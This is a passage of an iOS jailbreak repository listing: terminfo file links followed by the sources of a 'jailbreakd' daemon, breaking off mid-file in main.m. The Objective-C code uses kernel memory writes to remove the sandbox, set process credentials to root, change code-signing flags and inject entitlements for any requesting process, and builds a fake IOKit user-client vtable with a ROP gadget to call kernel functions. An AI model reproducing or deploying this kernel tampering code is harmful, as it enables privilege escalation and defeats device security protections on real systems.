https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/73/screen.rxvt


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/73/screen.teraterm:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/73/screen.teraterm


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/73/screen.xterm-new:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/73/screen.xterm-new


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/73/screen.xterm-r6:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/73/screen.xterm-r6


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/73/screen.xterm-xfree86:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/73/screen.xterm-xfree86


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/73/screen2:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/73/screen2


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/73/screen3:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/73/screen3


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/76/vt100:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/76/vt100


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/76/vt100+:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/76/vt100+


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/76/vt100+enq:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/76/vt100+enq


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/76/vt100+fnkeys:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/76/vt100+fnkeys


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/76/vt100+keypad:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/76/vt100+keypad


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/76/vt100+pfkeys:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/76/vt100+pfkeys


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/76/vt100-am:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/76/vt100-am


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/76/vt100-bm:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/76/vt100-bm


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/76/vt100-bm-o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/76/vt100-bm-o


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/76/vt100-bot-s:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/76/vt100-bot-s


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/76/vt100-nam:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/76/vt100-nam


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/76/vt100-nam-w:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/76/vt100-nam-w


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/76/vt100-nav:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/76/vt100-nav


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/76/vt100-nav-w:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/76/vt100-nav-w


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/76/vt100-putty:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/76/vt100-putty


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/76/vt100-s:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/76/vt100-s


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/76/vt100-s-bot:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/76/vt100-s-bot


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/76/vt100-s-top:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/76/vt100-s-top


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/76/vt100-top-s:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/76/vt100-top-s


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/76/vt100-vb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/76/vt100-vb


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/76/vt100-w:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/76/vt100-w


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/76/vt100-w-am:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/76/vt100-w-am


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/76/vt100-w-nam:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/76/vt100-w-nam


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/76/vt100-w-nav:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/76/vt100-w-nav


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/76/vt100nam:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/76/vt100nam


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/78/xterm-256color:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/78/xterm-256color


--------------------------------------------------------------------------------
/multi_path/jailbreakd/Makefile:
--------------------------------------------------------------------------------
 1 | include $(THEOS)/makefiles/common.mk
 2 | 
 3 | ARCHS = arm64
 4 | 
 5 | TOOL_NAME = jailbreakd
 6 | jailbreakd_FILES = $(wildcard *.m) $(wildcard *.c)
 7 | CFLAGS += -Wno-everything
 8 | jailbreakd_PRIVATE_FRAMEWORKS = IOKit AppSupport
 9 | include $(THEOS_MAKE_PATH)/tool.mk
10 | 


--------------------------------------------------------------------------------
/multi_path/jailbreakd/README.md:
--------------------------------------------------------------------------------
 1 | # rootless jailbreakd
 2 | 
 3 | A small jailbreakd offering some more functionality to the jailbreak. Uses CPDisctributedMessageCenter. To compile you need theos (why? cus why not? and I like theos. If you're smart enough you can still compile it manually very easily so yeah)
 4 | 
 5 | # Setup
 6 | 
 7 | - Grab AppSupport headers and add them into your include path (https://github.com/theos/headers/tree/05405174749d912f7726121fcb5f27de73af0f08/AppSupport)
 8 | - Include "AppSupport/CPDistributedMessagingCenter.h" on your main.m file
 9 | - Link with https://github.com/jakeajames/rootme-tutorial/blob/master/AppSupport.tbd
10 | - The general syntax follows as this:
11 | ```
12 | CPDistributedMessagingCenter *messageCenter = [CPDistributedMessagingCenter centerNamed:@"com.jakeashacks.rootme"];
13 | [messageCenter sendMessageAndReceiveReplyName:@"MESSAGE_NAME" userInfo:[NSDictionary dictionaryWithObject:[NSString stringWithFormat:@"%d", getpid()] forKey:@"pid"]];
14 | ```
15 | # Compiling
16 |     ./make.sh
17 | # Commands
18 | 
19 | At the moment these commands are available
20 | 
21 | - "rootme": does setuid(0) and setgid(0) for you
22 | - "unsandbox": gets rid of most of the sandbox (This will not be any useful right now since to call jailbreakd you have to be unsandboxed already)
23 | - "platformize": marks your binary as platform by setting TF_PLATFORM and CS_PLATFORM_BINARY
24 | - "setcsflags": Sets some flags such as CS_PLATFORM_BINARY, CS_GET_TASK_ALLOW, CS_DEBUGGED etc
25 | - "entitle": Set entitlement to true or false. Example:
26 | ```
27 | CPDistributedMessagingCenter *messageCenter = [CPDistributedMessagingCenter centerNamed:@"com.jakeashacks.rootme"];
28 | NSMutableDictionary *dict = [NSMutableDictionary dictionary];
29 | [dict setValue:@"com.apple.private.skip-library.validation" forKey:@"ent"]; //entitlement name
30 | [dict setValue:@"true" forKey:@"value"]; //true or false
31 | [dict setValue:[NSString stringWithFormat:@"%d", getpid()] forKey:@"pid"];
32 | [messageCenter sendMessageAndReceiveReplyName:@"entitle" userInfo:dict];
33 | ```
34 | 
35 | # Do binaries need suid permissions or root ownership?
36 | 
37 | No. I didn't bother with that because a) There isn't a package manager so all binaries are controlled by you, b) there's no root remount thus nothing can cause a big mess, c) you need to be unsandboxed to make a call to jailbreakd (all binaries you run via SSH satisfy this requirement) and that's enough for me. Is it coming? Probably yes
38 | 
39 | # Coming soon
40 | 
41 | - I guess a nice response from jailbreakd telling us what happened in the other world
42 | - (?) check for suid permissions and ownership
43 | 


--------------------------------------------------------------------------------
/multi_path/jailbreakd/ent.xml:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="UTF-8"?>
 2 | <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
 3 | <plist version="1.0">
 4 | <dict>
 5 | 	<key>platform-application</key>
 6 | 	<true/>
 7 | 	<key>get-task-allow</key>
 8 | 	<true/>
 9 | 	<key>com.apple.system-task-ports</key>
10 | 	<true/>
11 | 	<key>task_for_pid-allow</key>
12 | 	<true/>
13 | 	<key>com.apple.private.memorystatus</key>
14 | 	<true/>
15 |     <key>com.apple.private.security.container-required</key>
16 |     <false/>
17 | </dict>
18 | </plist>
19 | 
20 | 


--------------------------------------------------------------------------------
/multi_path/jailbreakd/jailbreakd:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/jailbreakd/jailbreakd


--------------------------------------------------------------------------------
/multi_path/jailbreakd/jelbrek.h:
--------------------------------------------------------------------------------
1 | 
2 | void init_jelbrek(mach_port_t tfp0, uint64_t kernel_base);
3 | BOOL unsandbox(pid_t pid);
4 | void setcsflags(pid_t pid);
5 | BOOL get_root(pid_t pid);
6 | void platformize(pid_t pid);
7 | void entitlePid(pid_t pid, const char *ent1, BOOL val1);
8 | 


--------------------------------------------------------------------------------
/multi_path/jailbreakd/jelbrek.m:
--------------------------------------------------------------------------------
 1 | #import <Foundation/Foundation.h>
 2 | #include <err.h>
 3 | #include "kern_utils.h"
 4 | #include "patchfinder64.h"
 5 | #include "offsetof.h"
 6 | #include "jelbrek.h"
 7 | #include <sys/mount.h>
 8 | #include "kexecute.h"
 9 | 
10 | 
11 | void init_jelbrek(mach_port_t tfp0, uint64_t kernel_base) {
12 |     init_kernel_utils(tfp0);
13 |     init_kernel(kernel_base, NULL);
14 | }
15 | 
16 | BOOL unsandbox(pid_t pid) {
17 |     uint64_t proc = proc_for_pid(pid);
18 |     uint64_t ucred = kread64(proc + offsetof_p_ucred); //our credentials
19 |     kwrite64(kread64(ucred + 0x78) + 8 + 8, 0x0); //get rid of sandbox by writing 0x0 to it
20 |     
21 |     return (kread64(kread64(ucred + 0x78) + 8 + 8) == 0) ? YES : NO;
22 | }
23 | 
24 | void setcsflags(pid_t pid) {
25 |     uint64_t proc = proc_for_pid(pid);
26 |     uint32_t csflags = kread32(proc + offsetof_p_csflags);
27 |     csflags = (csflags | CS_PLATFORM_BINARY | CS_INSTALLER | CS_GET_TASK_ALLOW | CS_DEBUGGED) & ~(CS_RESTRICT | CS_HARD | CS_KILL);
28 |     kwrite32(proc + offsetof_p_csflags, csflags);
29 | }
30 | 
31 | void platformize(pid_t pid) {
32 |     uint64_t proc = proc_for_pid(pid);
33 |     NSLog(@"Platformizing process at address 0x%llx\n", proc);
34 |     uint64_t task = kread64(proc + offsetof_task);
35 |     uint32_t t_flags = kread32(task + offsetof_t_flags);
36 |     t_flags |= 0x400;
37 |     NSLog(@"Flicking on task @0x%llx t->flags to have TF_PLATFORM (0x%x)..\n", task, t_flags);
38 |     kwrite32(task+offsetof_t_flags, t_flags);
39 |     uint32_t csflags = kread32(proc + offsetof_p_csflags);
40 |     kwrite32(proc + offsetof_p_csflags, csflags | 0x24004001u);
41 | }
42 | 
43 | BOOL get_root(pid_t pid) {
44 |     uint64_t proc = proc_for_pid(pid);
45 |     uint64_t ucred = kread64(proc + offsetof_p_ucred);
46 |     //make everything 0 without setuid(0), pretty straightforward. 
47 |     kwrite32(proc + offsetof_p_uid, 0);
48 |     kwrite32(proc + offsetof_p_ruid, 0);
49 |     kwrite32(proc + offsetof_p_gid, 0);
50 |     kwrite32(proc + offsetof_p_rgid, 0);
51 |     kwrite32(ucred + offsetof_ucred_cr_uid, 0);
52 |     kwrite32(ucred + offsetof_ucred_cr_ruid, 0);
53 |     kwrite32(ucred + offsetof_ucred_cr_svuid, 0);
54 |     kwrite32(ucred + offsetof_ucred_cr_ngroups, 1);
55 |     kwrite32(ucred + offsetof_ucred_cr_groups, 0);
56 |     kwrite32(ucred + offsetof_ucred_cr_rgid, 0);
57 |     kwrite32(ucred + offsetof_ucred_cr_svgid, 0);
58 |     
59 |     return (geteuid() == 0) ? YES : NO;
60 | }
61 | void entitlePid(pid_t pid, const char *ent1, _Bool val1) {
62 |     uint64_t proc = proc_for_pid(pid);
63 |     uint64_t ucred = kread64(proc+0x100);
64 |     uint64_t entitlements = kread64(kread64(ucred+0x78)+0x8);
65 |     
66 |     uint64_t current = OSDictionary_GetItem(entitlements, ent1);
67 |     
68 |     if (current == 0) {
69 |         usleep(1000);
70 |         NSLog(@"[*] Setting Entitlements...");
71 |         NSLog(@"before: %s is 0x%llx", ent1, current);
72 |         usleep(1000);
73 |         OSDictionary_SetItem(entitlements, ent1, (val1) ? find_OSBoolean_True() : find_OSBoolean_False());
74 |         usleep(1000);
75 |         NSLog(@"after: %s is 0x%llx", ent1, OSDictionary_GetItem(entitlements, ent1));
76 |     }
77 | }
78 | 
79 | 
80 | 


--------------------------------------------------------------------------------
/multi_path/jailbreakd/kern_utils.h:
--------------------------------------------------------------------------------
 1 | //
 2 | //  fun_utils.h
 3 | //  async_wake_ios
 4 | //
 5 | //  Created by George on 18/12/17.
 6 | //  Copyright © 2017 Ian Beer. All rights reserved.
 7 | //
 8 | 
 9 | #ifndef fun_utils_h
10 | #define fun_utils_h
11 | 
12 | #include <stdio.h>
13 | #include <mach-o/loader.h>
14 | #include <CommonCrypto/CommonDigest.h>
15 | #include <stdlib.h>
16 | #include <fcntl.h>
17 | #include <unistd.h>
18 | #include <errno.h>
19 | #include <mach/mach.h>
20 | #include <sys/stat.h>
21 | #include <sys/mount.h>
22 | 
23 | // Needed definitions
24 | kern_return_t mach_vm_allocate(vm_map_t target, mach_vm_address_t *address, mach_vm_size_t size, int flags);
25 | kern_return_t mach_vm_read_overwrite(vm_map_t target_task, mach_vm_address_t address, mach_vm_size_t size, mach_vm_address_t data, mach_vm_size_t *outsize);
26 | kern_return_t mach_vm_write(vm_map_t target_task, mach_vm_address_t address, vm_offset_t data, mach_msg_type_number_t dataCnt);
27 | kern_return_t mach_vm_deallocate(vm_map_t target, mach_vm_address_t *address, mach_vm_size_t size);
28 | 
29 | // "General" purpose
30 | uint8_t *get_sha256(uint8_t* code_dir);
31 | uint8_t *get_code_directory(const char* name);
32 | int cp(const char *from, const char *to);
33 | int file_exist(char *filename);
34 | 
35 | // Kernel utility stuff
36 | void init_kernel_utils(mach_port_t tfp0);
37 | uint64_t kalloc(vm_size_t size);
38 | void kfree(mach_vm_address_t address, vm_size_t size);
39 | size_t kread(uint64_t where, void *p, size_t size);
40 | uint32_t kread32(uint64_t where);
41 | uint64_t kread64(uint64_t where);
42 | size_t kwrite(uint64_t where, const void *p, size_t size);
43 | void kwrite32(uint64_t where, uint32_t what);
44 | void kwrite64(uint64_t where, uint64_t what);
45 | void kmemcpy(uint64_t dest, uint64_t src, uint32_t length);
46 | mach_port_t fake_host_priv(void);
47 | uint64_t zm_fix_addr(uint64_t addr);
48 | uint64_t proc_for_pid(pid_t pid);
49 | uint64_t proc_for_name(char *nm);
50 | unsigned int pid_for_name(char *nm);
51 | uint64_t find_port_address(mach_port_name_t port);
52 | uint64_t task_self_addr(void);
53 | uint64_t kmem_alloc_wired(uint64_t size);
54 | #endif /* fun_utils_h */
55 | 
56 | #define DEBUG_LOG //comment this line if you don't want to debug into /var/log
57 | #ifndef DEBUG_LOG
58 | #define NSLog(str, ...) fprintf(stdout, (char*)[str UTF8String], __VA_ARGS__) && NSLog(str, __VA_ARGS__)
59 | #endif
60 | 


--------------------------------------------------------------------------------
/multi_path/jailbreakd/kexecute.h:
--------------------------------------------------------------------------------
1 | #include <mach/mach.h>
2 | #include <inttypes.h>
3 | 
4 | uint64_t kexecute(uint64_t addr, uint64_t x0, uint64_t x1, uint64_t x2, uint64_t x3, uint64_t x4, uint64_t x5, uint64_t x6);
5 | void init_kexecute(void);
6 | void term_kexecute(void);
7 | 


--------------------------------------------------------------------------------
/multi_path/jailbreakd/kexecute.m:
--------------------------------------------------------------------------------
  1 | 
  2 | #include <pthread.h>
  3 | #include "kern_utils.h"
  4 | #include "kexecute.h"
  5 | #include "patchfinder64.h"
  6 | #include "offsetof.h"
  7 | #include <IOKit/IOKitLib.h>
  8 | 
  9 | mach_port_t prepare_user_client(void) {
 10 |   kern_return_t err;
 11 |   mach_port_t user_client;
 12 |   io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching("IOSurfaceRoot"));
 13 | 
 14 |   if (service == IO_OBJECT_NULL){
 15 |     NSLog(@" [-] unable to find service\n");
 16 |     exit(EXIT_FAILURE);
 17 |   }
 18 | 
 19 |   err = IOServiceOpen(service, mach_task_self(), 0, &user_client);
 20 |   if (err != KERN_SUCCESS){
 21 |     NSLog(@" [-] unable to get user client connection\n");
 22 |     exit(EXIT_FAILURE);
 23 |   }
 24 | 
 25 | 
 26 |   //
 27 |     NSLog(@"got user client: 0x%x\n", user_client);
 28 |   return user_client;
 29 | }
 30 | 
 31 | // TODO: Consider removing this - jailbreakd runs all kernel ops on the main thread
 32 | pthread_mutex_t kexecute_lock;
 33 | static mach_port_t user_client;
 34 | static uint64_t IOSurfaceRootUserClient_port;
 35 | static uint64_t IOSurfaceRootUserClient_addr;
 36 | static uint64_t fake_vtable;
 37 | static uint64_t fake_client;
 38 | const int fake_kalloc_size = 0x1000;
 39 | 
 40 | void init_kexecute(void) {
 41 |     user_client = prepare_user_client();
 42 | 
 43 |     // From v0rtex - get the IOSurfaceRootUserClient port, and then the address of the actual client, and vtable
 44 |     IOSurfaceRootUserClient_port = find_port_address(user_client); // UserClients are just mach_ports, so we find its address
 45 |     //
 46 |     NSLog(@"Found port: 0x%llx\n", IOSurfaceRootUserClient_port);
 47 | 
 48 |     IOSurfaceRootUserClient_addr = kread64(IOSurfaceRootUserClient_port + offsetof_ip_kobject); // The UserClient itself (the C++ object) is at the kobject field
 49 |     //
 50 |     NSLog(@"Found addr: 0x%llx\n", IOSurfaceRootUserClient_addr);
 51 | 
 52 |     uint64_t IOSurfaceRootUserClient_vtab = kread64(IOSurfaceRootUserClient_addr); // vtables in C++ are at *object
 53 |     //
 54 |     NSLog(@"Found vtab: 0x%llx\n", IOSurfaceRootUserClient_vtab);
 55 | 
 56 |     // The aim is to create a fake client, with a fake vtable, and overwrite the existing client with the fake one
 57 |     // Once we do that, we can use IOConnectTrap6 to call functions in the kernel as the kernel
 58 | 
 59 | 
 60 |     // Create the vtable in the kernel memory, then copy the existing vtable into there
 61 |     fake_vtable = kalloc(fake_kalloc_size);
 62 |     //
 63 |     NSLog(@"Created fake_vtable at %016llx\n", fake_vtable);
 64 | 
 65 |     for (int i = 0; i < 0x200; i++) {
 66 |         kwrite64(fake_vtable+i*8, kread64(IOSurfaceRootUserClient_vtab+i*8));
 67 |     }
 68 | 
 69 |     //
 70 |     NSLog(@"Copied some of the vtable over\n");
 71 | 
 72 |     // Create the fake user client
 73 |     fake_client = kalloc(fake_kalloc_size);
 74 |     //
 75 |     NSLog(@"Created fake_client at %016llx\n", fake_client);
 76 | 
 77 |     for (int i = 0; i < 0x200; i++) {
 78 |         kwrite64(fake_client+i*8, kread64(IOSurfaceRootUserClient_addr+i*8));
 79 |     }
 80 | 
 81 |     //
 82 |     NSLog(@"Copied the user client over\n");
 83 | 
 84 |     // Write our fake vtable into the fake user client
 85 |     kwrite64(fake_client, fake_vtable);
 86 | 
 87 |     // Replace the user client with ours
 88 |     kwrite64(IOSurfaceRootUserClient_port + offsetof_ip_kobject, fake_client);
 89 | 
 90 |     // Now the userclient port we have will look into our fake user client rather than the old one
 91 | 
 92 |     // Replace IOUserClient::getExternalTrapForIndex with our ROP gadget (add x0, x0, #0x40; ret;)
 93 |     kwrite64(fake_vtable+8*0xB7, find_add_x0_x0_0x40_ret());
 94 | 
 95 |     //
 96 |     NSLog(@"Wrote the `add x0, x0, #0x40; ret;` gadget over getExternalTrapForIndex");
 97 | 
 98 |     pthread_mutex_init(&kexecute_lock, NULL);
 99 | }
100 | 
101 | void term_kexecute(void) {
102 |     kwrite64(IOSurfaceRootUserClient_port + offsetof_ip_kobject, IOSurfaceRootUserClient_addr);
103 |     kfree(fake_vtable, fake_kalloc_size);
104 |     kfree(fake_client, fake_kalloc_size);
105 | }
106 | 
107 | uint64_t kexecute(uint64_t addr, uint64_t x0, uint64_t x1, uint64_t x2, uint64_t x3, uint64_t x4, uint64_t x5, uint64_t x6) {
108 |     pthread_mutex_lock(&kexecute_lock);
109 | 
110 |     // When calling IOConnectTrapX, this makes a call to iokit_user_client_trap, which is the user->kernel call (MIG). This then calls IOUserClient::getTargetAndTrapForIndex
111 |     // to get the trap struct (which contains an object and the function pointer itself). This function calls IOUserClient::getExternalTrapForIndex, which is expected to return a trap.
112 |     // This jumps to our gadget, which returns +0x40 into our fake user_client, which we can modify. The function is then called on the object. But how C++ actually works is that the
113 |     // function is called with the first arguement being the object (referenced as `this`). Because of that, the first argument of any function we call is the object, and everything else is passed
114 |     // through like normal.
115 | 
116 |     // Because the gadget gets the trap at user_client+0x40, we have to overwrite the contents of it
117 |     // We will pull a switch when doing so - retrieve the current contents, call the trap, put back the contents
118 |     // (i'm not actually sure if the switch back is necessary but meh)
119 | 
120 |     uint64_t offx20 = kread64(fake_client+0x40);
121 |     uint64_t offx28 = kread64(fake_client+0x48);
122 |     kwrite64(fake_client+0x40, x0);
123 |     kwrite64(fake_client+0x48, addr);
124 |     uint64_t returnval = IOConnectTrap6(user_client, 0, (uint64_t)(x1), (uint64_t)(x2), (uint64_t)(x3), (uint64_t)(x4), (uint64_t)(x5), (uint64_t)(x6));
125 |     kwrite64(fake_client+0x40, offx20);
126 |     kwrite64(fake_client+0x48, offx28);
127 | 
128 |     pthread_mutex_unlock(&kexecute_lock);
129 | 
130 |     return returnval;
131 | }
132 | 


--------------------------------------------------------------------------------
/multi_path/jailbreakd/main.m:
--------------------------------------------------------------------------------
  1 | #import <Foundation/Foundation.h>
  2 | #include <err.h>
  3 | #include "kern_utils.h"
  4 | #include "patchfinder64.h"
  5 | #include "jelbrek.h"
  6 | #include <AppSupport/CPDistributedMessagingCenter.h>
  7 | #include "offsets.h"
  8 | 
  9 | mach_port_t tfp0;
 10 | uint64_t kernel_base;
 11 | uint64_t kernel_slide;
 12 | int pid;
 13 | 
 14 | 
 15 | @interface Listener : NSObject
 16 | - (NSDictionary *)rootme:(NSString *)name message:(NSDictionary *)userInfo;
 17 | - (NSDictionary *)unsandbox:(NSString *)name message:(NSDictionary *)userInfo;
 18 | - (NSDictionary *)platformize:(NSString *)name message:(NSDictionary *)userInfo;
 19 | - (NSDictionary *)entitle:(NSString *)name message:(NSDictionary *)userInfo;
 20 | - (NSDictionary *)setcsflags:(NSString *)name message:(NSDictionary *)userInfo;
 21 | -(id)init;
 22 | @end
 23 | 
 24 | @implementation Listener
 25 | -(id)init {
 26 |     
 27 |     NSLog(@"Listening...");
 28 |     
 29 |     CPDistributedMessagingCenter *messagingCenter = [CPDistributedMessagingCenter centerNamed:@"com.jakeashacks.jbclient"]; //CPDistributedMessagingCenter is a great way to send messages between processes, without advanced knowledge at all. Why bother with Electra's way when the system offers APIs to handle all the messages?
 30 |     [messagingCenter runServerOnCurrentThread];
 31 |     [messagingCenter registerForMessageName:@"rootme" target:self selector:@selector(rootme:message:)];
 32 |     [messagingCenter registerForMessageName:@"unsandbox" target:self selector:@selector(unsandbox:message:)];
 33 |     [messagingCenter registerForMessageName:@"platformize" target:self selector:@selector(platformize:message:)];
 34 |     [messagingCenter registerForMessageName:@"entitle" target:self selector:@selector(entitle:message:)];
 35 |     [messagingCenter registerForMessageName:@"setcsflags" target:self selector:@selector(setcsflags:message:)];
 36 |     
 37 |     CFRunLoopRun(); //this ensures that the binary will keep running
 38 | }
 39 | 
 40 | - (NSDictionary *)rootme:(NSString *)name message:(NSDictionary *)userInfo {
 41 |     pid = atoi([[userInfo objectForKey:@"pid"] UTF8String]);
 42 |     NSLog(@"[*] Got request from pid %d\n", pid);
 43 |     get_root(pid);
 44 |     return 0;
 45 | }
 46 | 
 47 | - (NSDictionary *)unsandbox:(NSString *)name message:(NSDictionary *)userInfo {
 48 |     pid = atoi([[userInfo objectForKey:@"pid"] UTF8String]);
 49 |     NSLog(@"[*] Got request from pid %d\n", pid);
 50 |     unsandbox(pid);
 51 |     return 0;
 52 | }
 53 | - (NSDictionary *)platformize:(NSString *)name message:(NSDictionary *)userInfo {
 54 |     pid = atoi([[userInfo objectForKey:@"pid"] UTF8String]);
 55 |     NSLog(@"[*] Got request from pid %d\n", pid);
 56 |     platformize(pid);
 57 |     return 0;
 58 | }
 59 | - (NSDictionary *)entitle:(NSString *)name message:(NSDictionary *)userInfo {
